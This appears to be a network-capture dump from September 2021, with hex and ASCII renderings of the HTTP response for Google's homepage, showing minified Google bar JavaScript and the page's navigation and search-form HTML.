                                  2021-09-14 19:48:34 UTC69INData Raw: 36 64 66 32 0d 0a 61 5b 64 5d 3b 61 5b 64 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6b 3d 66 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 6d 3d 63 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 6b 3f 6d 3a 76 6f 69 64 20 30 3d 3d 6d 3f 6b 3a 6d 26 26 6b 7d 7d 7d 76 61 72 20 64 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 2e 62 76 2e 6d 3d 3d 61 7d 7d 2c 65 61 3d 64 61 28 31 29 2c 66 61 3d 64 61 28 32 29 3b 70 28 22 73 62 22 2c 65 61 29 3b 70 28 22 6b 6e 22 2c 66 61 29 3b 68 2e 61 3d 5f 74 76 76 3b 68 2e 62 3d 5f 74 76 66 3b 68 2e 63 3d 5f 74 76 6e 3b 68 2e 69 3d 61 61 3b 76 61 72 20
                                  Data Ascii: 6df2a[d];a[d]=function(){var k=f.apply(this,arguments),m=c.apply(this,arguments);return void 0==k?m:void 0==m?k:m&&k}}}var da=function(a){return function(){return g.bv.m==a}},ea=da(1),fa=da(2);p("sb",ea);p("kn",fa);h.a=_tvv;h.b=_tvf;h.c=_tvn;h.i=aa;var
                                  2021-09-14 19:48:34 UTC71INData Raw: 64 5d 3d 63 5b 64 5d 3b 74 72 79 7b 75 61 28 61 29 7d 63 61 74 63 68 28 66 29 7b 7d 7d 7d 3b 70 28 22 6d 64 63 22 2c 76 29 3b 70 28 22 6d 64 69 22 2c 6c 61 29 3b 70 28 22 62 6e 63 22 2c 77 29 3b 70 28 22 71 47 43 22 2c 74 61 29 3b 70 28 22 71 6d 22 2c 42 29 3b 70 28 22 71 64 22 2c 78 29 3b 70 28 22 6c 62 22 2c 44 29 3b 70 28 22 6d 63 66 22 2c 70 61 29 3b 70 28 22 62 63 66 22 2c 6f 61 29 3b 70 28 22 61 71 22 2c 41 29 3b 70 28 22 6d 64 64 22 2c 22 22 29 3b 0a 70 28 22 68 61 73 22 2c 71 61 29 3b 70 28 22 74 72 68 22 2c 76 61 29 3b 70 28 22 74 65 76 22 2c 73 61 29 3b 69 66 28 68 2e 61 28 22 6d 3b 2f 5f 2f 73 63 73 2f 61 62 63 2d 73 74 61 74 69 63 2f 5f 2f 6a 73 2f 6b 3d 67 61 70 69 2e 67 61 70 69 2e 65 6e 2e 37 52 70 68 74 4e 63 47 48 44 51 2e 4f 2f 64 3d 31
                                  Data Ascii: d]=c[d];try{ua(a)}catch(f){}}};p("mdc",v);p("mdi",la);p("bnc",w);p("qGC",ta);p("qm",B);p("qd",x);p("lb",D);p("mcf",pa);p("bcf",oa);p("aq",A);p("mdd","");p("has",qa);p("trh",va);p("tev",sa);if(h.a("m;/_/scs/abc-static/_/js/k=gapi.gapi.en.7RphtNcGHDQ.O/d=1
                                  2021-09-14 19:48:34 UTC72INData Raw: 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 67 65 6e 5f 32 30 34 3f 61 74 79 70 3d 69 26 7a 78 3d 22 2c 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2c 22 26 6a 65 78 70 69 64 3d 22 2c 64 28 22 32 38 38 33 34 22 29 2c 22 26 73 72 63 70 67 3d 22 2c 64 28 22 70 72 6f 70 3d 31 22 29 2c 22 26 6a 73 72 3d 22 2c 4d 61 74 68 2e 72 6f 75 6e 64 28 31 2f 46 61 29 2c 22 26 6f 67 65 76 3d 22 2c 64 28 22 6b 76 78 41 59 62 4f 43 42 2d 62 46 7a 37 73 50 74 37 4f 55 2d 41 30 22 29 2c 22 26 6f 67 66 3d 22 2c 67 2e 62 76 2e 66 2c 22 26 6f 67 72 70 3d 22 2c 64 28 22 22 29 2c 22 26 6f 67 76 3d 22 2c 64 28 22 33 39 35 33 37 32 39 35 34 2e 30 22 29 2c 22 26 6f 67 67 76 3d 22 2b 64 28 22 65 73 5f 70 6c 75 73 6f 6e 65 5f 67 63 5f 32 30 32 31 30 38 30 33 2e
                                  Data Ascii: //www.google.com/gen_204?atyp=i&zx=",(new Date).getTime(),"&jexpid=",d("28834"),"&srcpg=",d("prop=1"),"&jsr=",Math.round(1/Fa),"&ogev=",d("kvxAYbOCB-bFz7sPt7OU-A0"),"&ogf=",g.bv.f,"&ogrp=",d(""),"&ogv=",d("395372954.0"),"&oggv="+d("es_plusone_gc_20210803.
                                  2021-09-14 19:48:34 UTC73INData Raw: 72 73 3d 22 2c 22 41 41 32 59 72 54 76 7a 56 4b 52 79 73 75 6d 6a 50 44 45 37 52 4d 7a 63 56 68 33 6a 78 79 73 51 43 67 22 5d 3b 4b 61 26 26 61 2e 70 75 73 68 28 22 3f 68 6f 73 74 3d 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 26 62 75 73 74 3d 6f 67 2e 6f 67 32 2e 65 6e 5f 55 53 2e 6b 30 63 62 66 4e 53 33 64 6b 63 2e 44 55 22 29 3b 61 3d 61 2e 6a 6f 69 6e 28 22 22 29 3b 72 61 28 61 29 7d 3b 70 28 22 63 61 22 2c 4a 29 3b 70 28 22 63 72 22 2c 4b 29 3b 70 28 22 63 63 22 2c 48 29 3b 68 2e 6b 3d 4a 3b 68 2e 6c 3d 4b 3b 68 2e 6d 3d 48 3b 68 2e 6e 3d 4c 61 3b 68 2e 70 3d 4e 61 3b 68 2e 71 3d 4d 61 3b 76 61 72 20 4f 61 3d 5b 22 67 62 5f 37 31 22 2c 22 67 62 5f 31 35 35 22 5d 2c 50 61 3b 66 75 6e 63 74 69 6f 6e 20 51 61 28 61 29 7b 50 61 3d 61 7d 66 75 6e 63 74
                                  Data Ascii: rs=","AA2YrTvzVKRysumjPDE7RMzcVh3jxysQCg"];Ka&&a.push("?host=www.gstatic.com&bust=og.og2.en_US.k0cbfNS3dkc.DU");a=a.join("");ra(a)};p("ca",J);p("cr",K);p("cc",H);h.k=J;h.l=K;h.m=H;h.n=La;h.p=Na;h.q=Ma;var Oa=["gb_71","gb_155"],Pa;function Qa(a){Pa=a}funct
                                  2021-09-14 19:48:34 UTC74INData Raw: 7b 76 61 72 20 6c 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6e 29 3b 6c 26 26 6c 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 4b 28 6c 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 22 67 62 74 6f 22 29 7d 7d 7d 5a 61 28 66 29 26 26 24 61 28 66 29 3b 4f 3d 64 3b 4a 28 6b 2c 22 67 62 74 6f 22 29 7d 7d 7d 7d 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 74 67 28 61 2c 62 2c 21 30 29 7d 29 3b 61 62 28 61 29 7d 63 61 74 63 68 28 71 29 7b 72 28 71 2c 22 73 62 22 2c 22 74 67 22 29 7d 7d 2c 63 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 63 6c 6f 73 65 28 61 29 7d 29 7d 2c 64 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 72 64 64 28 61 29 7d 29 7d 2c 59 61 3d 66 75
                                  Data Ascii: {var l=document.getElementById(n);l&&l.parentNode&&K(l.parentNode,"gbto")}}}Za(f)&&$a(f);O=d;J(k,"gbto")}}}}B(function(){g.tg(a,b,!0)});ab(a)}catch(q){r(q,"sb","tg")}},cb=function(a){B(function(){g.close(a)})},db=function(a){B(function(){g.rdd(a)})},Ya=fu
                                  2021-09-14 19:48:34 UTC76INData Raw: 73 65 20 6b 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6d 29 7d 7d 63 61 74 63 68 28 44 62 29 7b 72 28 44 62 2c 22 73 62 22 2c 22 61 6c 22 29 7d 7d 2c 65 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 62 2e 6c 65 6e 67 74 68 2c 0a 64 3d 30 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 48 28 61 2c 62 5b 64 5d 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 67 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 62 28 61 2c 62 2c 63 29 7d 2c 68 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 62 28 61 2c 22 67 62 65 22 2c 62 29 7d 2c 69 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 70 63 6d 26 26 67 2e 70 63 6d 28 29 7d 29 7d 2c 6a 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 42 28 66 75
                                  Data Ascii: se k.appendChild(m)}}catch(Db){r(Db,"sb","al")}},eb=function(a,b){for(var c=b.length,d=0;d<c;d++)if(H(a,b[d]))return!0;return!1},gb=function(a,b,c){fb(a,b,c)},hb=function(a,b){fb(a,"gbe",b)},ib=function(){B(function(){g.pcm&&g.pcm()})},jb=function(){B(fu
                                  2021-09-14 19:48:34 UTC77INData Raw: 6f 64 65 73 5b 62 5d 3b 62 2b 2b 29 69 66 28 48 28 63 2c 22 67 62 6d 73 67 22 29 29 72 65 74 75 72 6e 20 63 7d 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 70 62 26 26 77 69 6e 64 6f 77 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 70 62 29 7d 2c 74 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 22 69 6e 6e 65 72 22 2b 61 3b 61 3d 22 6f 66 66 73 65 74 22 2b 61 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 5b 62 5d 3f 77 69 6e 64 6f 77 5b 62 5d 3a 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 5b 61 5d 3f 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 5b 61 5d 3a 30 7d 2c 75 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72
                                  Data Ascii: odes[b];b++)if(H(c,"gbmsg"))return c},P=function(){pb&&window.clearTimeout(pb)},tb=function(a){var b="inner"+a;a="offset"+a;return window[b]?window[b]:document.documentElement&&document.documentElement[a]?document.documentElement[a]:0},ub=function(){retur
                                  2021-09-14 19:48:34 UTC78INData Raw: 28 22 6c 50 57 46 22 2c 42 62 29 7d 3b 77 69 6e 64 6f 77 2e 5f 5f 50 56 54 3d 22 22 3b 69 66 28 68 2e 61 28 22 31 22 29 26 26 68 2e 61 28 22 31 22 29 29 7b 76 61 72 20 43 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 42 62 28 66 75 6e 63 74 69 6f 6e 28 29 7b 41 28 22 70 77 22 2c 61 29 3b 44 28 22 70 77 22 29 7d 29 7d 3b 70 28 22 6c 50 57 22 2c 43 62 29 3b 77 2e 70 75 73 68 28 5b 22 70 77 22 2c 7b 75 72 6c 3a 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 6a 73 2f 61 62 63 2f 70 77 6d 5f 34 35 66 37 33 65 34 64 66 30 37 61 30 65 33 38 38 62 30 66 61 31 66 33 64 33 30 65 37 32 38 30 2e 6a 73 22 7d 5d 29 3b 76 61 72 20 45 62 3d 5b 5d 2c 46 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 45 62 5b 30 5d 3d 61 7d 2c 47 62 3d 66 75 6e 63 74 69 6f 6e 28
                                  Data Ascii: ("lPWF",Bb)};window.__PVT="";if(h.a("1")&&h.a("1")){var Cb=function(a){Bb(function(){A("pw",a);D("pw")})};p("lPW",Cb);w.push(["pw",{url:"//ssl.gstatic.com/gb/js/abc/pwm_45f73e4df07a0e388b0fa1f3d30e7280.js"}]);var Eb=[],Fb=function(a){Eb[0]=a},Gb=function(
                                  2021-09-14 19:48:34 UTC80INData Raw: 31 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 32 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 34 29 3b 61 3d 5b 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 67 65 6e 5f 32 30 34 3f 61 74 79 70 3d 69 26 7a 78 3d 22 2c 66 2c 22 26 6f 67 65 3d 22 2c 61 2c 22 26 6f 67 65 78 3d 22 2c 6b 2c 22 26 6f 67 65 76 3d 22 2c 6d 2c 22 26 6f 67 66 3d 22 2c 6c 2c 22 26 6f 67 70 3d 22 2c 71 2c 22 26 6f 67 72 70 3d 22 2c 6e 2c 22 26 6f 67 73 72 3d 22 2c 63 2c 22 26 6f 67 76 3d 22 2c 45 2c 55 2c 22 26 6f 67 64 3d 22 2c 49 2c 22 26 6f 67 6c 3d 22 2c 56 2c 22 26 6f 67 63 3d 22 2c 57 2c 22 26 6f 67 75 73 3d 22 2c 79 5d 3b 69 66 28 62 29 7b 22 6f 67 77 22 69 6e 20 62 26 26 28 61 2e 70 75 73 68 28 22 26 6f 67 77 3d 22 2b 62 2e 6f 67 77 29 2c 64 65 6c 65 74 65 20 62 2e
                                  Data Ascii: 1);h.a("")&&(y|=2);h.a("")&&(y|=4);a=["//www.google.com/gen_204?atyp=i&zx=",f,"&oge=",a,"&ogex=",k,"&ogev=",m,"&ogf=",l,"&ogp=",q,"&ogrp=",n,"&ogsr=",c,"&ogv=",E,U,"&ogd=",I,"&ogl=",V,"&ogc=",W,"&ogus=",y];if(b){"ogw"in b&&(a.push("&ogw="+b.ogw),delete b.
                                  2021-09-14 19:48:34 UTC81INData Raw: 74 2d 75 73 65 72 3d 73 39 36 22 2c 63 70 3a 22 31 22 2c 78 70 3a 68 2e 61 28 22 31 22 29 2c 6d 67 3a 22 25 31 24 73 20 28 64 65 6c 65 67 61 74 65 64 29 22 2c 6d 64 3a 22 25 31 24 73 20 28 64 65 66 61 75 6c 74 29 22 2c 6d 68 3a 22 32 32 30 22 2c 73 3a 22 31 22 2c 70 70 3a 59 62 2c 70 70 6c 3a 68 2e 61 28 22 22 29 2c 70 70 61 3a 68 2e 61 28 22 22 29 2c 0a 70 70 6d 3a 22 47 6f 6f 67 6c 65 2b 20 70 61 67 65 22 7d 3b 76 2e 70 72 66 3d 24 62 7d 3b 76 61 72 20 53 2c 61 63 2c 54 2c 62 63 2c 58 3d 30 2c 63 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 2e 69 6e 64 65 78 4f 66 29 72 65 74 75 72 6e 20 61 2e 69 6e 64 65 78 4f 66 28 62 2c 63 29 3b 69 66 28 41 72 72 61 79 2e 69 6e 64 65 78 4f 66 29 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 6e 64 65
                                  Data Ascii: t-user=s96",cp:"1",xp:h.a("1"),mg:"%1$s (delegated)",md:"%1$s (default)",mh:"220",s:"1",pp:Yb,ppl:h.a(""),ppa:h.a(""),ppm:"Google+ page"};v.prf=$b};var S,ac,T,bc,X=0,cc=function(a,b,c){if(a.indexOf)return a.indexOf(b,c);if(Array.indexOf)return Array.inde
                                  2021-09-14 19:48:34 UTC82INData Raw: 65 6f 66 20 61 2e 6c 6f 61 64 7d 2c 6c 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 74 72 79 7b 69 63 28 64 6f 63 75 6d 65 6e 74 29 7c 7c 28 64 7c 7c 28 62 3d 22 6f 67 2d 75 70 2d 22 2b 62 29 2c 6a 63 28 29 3f 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 62 2c 63 29 3a 6b 63 28 61 29 26 26 28 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 62 2c 63 29 2c 61 2e 73 61 76 65 28 61 2e 69 64 29 29 29 7d 63 61 74 63 68 28 66 29 7b 66 2e 63 6f 64 65 21 3d 44 4f 4d 45 78 63 65 70 74 69 6f 6e 2e 51 55 4f 54 41 5f 45 58 43 45 45 44 45 44 5f 45 52 52 26 26 72 28 66 2c 22 75 70 22 2c 22 73 70 64 22 29 7d 7d 2c 6d 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 74 72 79 7b 69 66 28 69 63 28 64 6f 63 75 6d 65 6e 74 29 29 72 65
                                  Data Ascii: eof a.load},lc=function(a,b,c,d){try{ic(document)||(d||(b="og-up-"+b),jc()?e.localStorage.setItem(b,c):kc(a)&&(a.setAttribute(b,c),a.save(a.id)))}catch(f){f.code!=DOMException.QUOTA_EXCEEDED_ERR&&r(f,"up","spd")}},mc=function(a,b,c){try{if(ic(document))re
                                  2021-09-14 19:48:34 UTC83INData Raw: 2e 6c 69 62 73 26 26 43 26 26 43 28 6c 5b 31 5d 2e 6c 69 62 73 29 29 3b 6d 3c 6b 2e 6c 65 6e 67 74 68 26 26 73 65 74 54 69 6d 65 6f 75 74 28 61 2c 30 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 29 7b 30 3c 66 2d 2d 3f 73 65 74 54 69 6d 65 6f 75 74 28 62 2c 30 29 3a 61 28 29 7d 76 61 72 20 63 3d 68 2e 61 28 22 31 22 29 2c 64 3d 68 2e 61 28 22 22 29 2c 66 3d 33 2c 6b 3d 77 2c 6d 3d 30 2c 6e 3d 77 69 6e 64 6f 77 2e 67 62 61 72 4f 6e 52 65 61 64 79 3b 69 66 28 6e 29 74 72 79 7b 6e 28 29 7d 63 61 74 63 68 28 6c 29 7b 72 28 6c 2c 22 6d 6c 22 2c 22 6f 72 22 29 7d 64 3f 70 28 22 6c 64 62 22 2c 61 29 3a 63 3f 63 61 28 77 69 6e 64 6f 77 2c 22 6c 6f 61 64 22 2c 62 29 3a 62 28 29 7d 70 28 22 72 64 6c 22 2c 71 63 29 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67
                                  Data Ascii: .libs&&C&&C(l[1].libs));m<k.length&&setTimeout(a,0)}function b(){0<f--?setTimeout(b,0):a()}var c=h.a("1"),d=h.a(""),f=3,k=w,m=0,n=window.gbarOnReady;if(n)try{n()}catch(l){r(l,"ml","or")}d?p("ldb",a):c?ca(window,"load",b):b()}p("rdl",qc);}catch(e){window.g
                                  2021-09-14 19:48:34 UTC85INData Raw: 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 5f 22 2b 67 29 2c 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 5f 22 2b 61 29 3b 62 26 26 66 2e 6c 28 62 2c 68 2e 74 65 73 74 28 62 2e 63 6c 61 73 73 4e 61 6d 65 29 3f 22 67 62 6d 30 6c 22 3a 22 67 62 7a 30 6c 22 29 3b 63 26 26 66 2e 6b 28 63 2c 68 2e 74 65 73 74 28 63 2e 63 6c 61 73 73 4e 61 6d 65 29 3f 22 67 62 6d 30 6c 22 3a 22 67 62 7a 30 6c 22 29 7d 63 61 74 63 68 28 6c 29 7b 64 28 6c 2c 22 73 6a 22 2c 22 73 73 70 22 29 7d 67 3d 61 7d 2c 6d 3d 65 2e 71 73 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 68 72 65 66 3b 76 61 72 20 63 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66
                                  Data Ascii: ar b=document.getElementById("gb_"+g),c=document.getElementById("gb_"+a);b&&f.l(b,h.test(b.className)?"gbm0l":"gbz0l");c&&f.k(c,h.test(c.className)?"gbm0l":"gbz0l")}catch(l){d(l,"sj","ssp")}g=a},m=e.qs,n=function(a){var b=a.href;var c=window.location.href
                                  2021-09-14 19:48:34 UTC86INData Raw: 7d 3a 6b 5b 6c 5d 3d 67 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 77 69 6e 64 6f 77 2e 67 62 61 72 2e 72 64 6c 28 29 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 2e
                                  Data Ascii: }:k[l]=g;}catch(e){window.gbar&&gbar.logger&&gbar.logger.ml(e,{"_sn":"cfg.init"});}})();(function(){try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/window.gbar.rdl();}catch(e){window.gbar&&gbar.logger&&gbar.logger.
                                  2021-09-14 19:48:34 UTC87INData Raw: 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 38 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 50 6c 61 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 33 36 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 3f 67 6c 3d 47 42 26 74 61 62 3d 77 31 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 59 6f 75 54 75 62 65 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c
                                  Data Ascii: ref="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?gl=GB&tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><l
                                  2021-09-14 19:48:34 UTC88INData Raw: 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 35 31 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 6c 61 74 65 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 54 22 3e 54 72 61 6e 73 6c 61 74 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 31 30 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 6f 6f 6b 73 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 70 22 3e 42 6f 6f 6b 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 36 20 68 72
                                  Data Ascii: </li><li class=gbmtc><a class=gbmt id=gb_51 href="https://translate.google.co.uk/?hl=en&tab=wT">Translate</a></li><li class=gbmtc><a class=gbmt id=gb_10 href="https://books.google.co.uk/?hl=en&tab=wp">Books</a></li><li class=gbmtc><a class=gbmt id=gb_6 hr
                                  2021-09-14 19:48:34 UTC90INData Raw: 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 63 62 3e 3c 2f 73 70 61 6e 3e 3c 6f 6c 20 63 6c 61 73 73 3d 67 62 74 63 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 74 61 72 67 65 74 3d 5f 74 6f 70 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 53 65 72 76 69 63 65 4c 6f 67 69 6e 3f 68 6c 3d 65 6e 26 70 61 73 73 69 76 65 3d 74 72 75 65 26 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 26 65 63 3d 47 41 5a 41 41 51 22 20 6f 6e 63 6c 69 63 6b 3d 22 67 62 61 72 2e 6c 6f 67 67 65 72 2e 69 6c 28 39 2c 7b 6c 3a 27 69 27 7d 29 22 20 69 64 3d 67 62 5f 37 30 20 63 6c 61 73 73 3d 67 62 67 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74
                                  Data Ascii: </h2><span class=gbtcb></span><ol class=gbtc><li class=gbt><a target=_top href="https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com/&ec=GAZAAQ" onclick="gbar.logger.il(9,{l:'i'})" id=gb_70 class=gbgt><span class=gbt
                                  2021-09-14 19:48:34 UTC91INData Raw: 6c 67 61 22 3e 3c 69 6d 67 20 61 6c 74 3d 22 47 6f 6f 67 6c 65 22 20 68 65 69 67 68 74 3d 22 39 32 22 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 77 68 69 74 65 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 5f 32 37 32 78 39 32 64 70 2e 70 6e 67 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 38 70 78 20 30 20 31 34 70 78 22 20 77 69 64 74 68 3d 22 32 37 32 22 20 69 64 3d 22 68 70 6c 6f 67 6f 22 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 64 69 76 3e 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 73 65 61 72 63 68 22 20 6e 61 6d 65 3d 22 66 22 3e 3c 74 61 62 6c 65 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22
                                  Data Ascii: lga"><img alt="Google" height="92" src="/images/branding/googlelogo/1x/googlelogo_white_background_color_272x92dp.png" style="padding:28px 0 14px" width="272" id="hplogo"><br><br></div><form action="/search" name="f"><table cellpadding="0" cellspacing="0"
                                  2021-09-14 19:48:34 UTC92INData Raw: 77 41 4d 41 41 41 41 41 59 55 45 4b 6f 6d 72 6a 30 68 6a 44 6f 33 4a 53 34 4d 66 53 72 48 58 52 79 78 31 44 38 38 49 69 22 20 6e 61 6d 65 3d 22 69 66 6c 73 69 67 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 74 64 3e 3c 74 64 20 63 6c 61 73 73 3d 22 66 6c 20 73 62 6c 63 22 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 6e 6f 77 72 61 70 3d 22 22 20 77 69 64 74 68 3d 22 32 35 25 22 3e 3c 61 20 68 72 65 66 3d 22 2f 61 64 76 61 6e 63 65 64 5f 73 65 61 72 63 68 3f 68 6c 3d 65 6e 2d 47 42 26 61 6d 70 3b 61 75 74 68 75 73 65 72 3d 30 22 3e 41 64 76 61 6e 63 65 64 20 73 65 61 72 63 68 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 69 6e 70 75 74 20 69 64 3d 22 67 62 76 22 20 6e 61 6d 65 3d 22 67
                                  Data Ascii: wAMAAAAAYUEKomrj0hjDo3JS4MfSrHXRyx1D88Ii" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en-GB&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="g
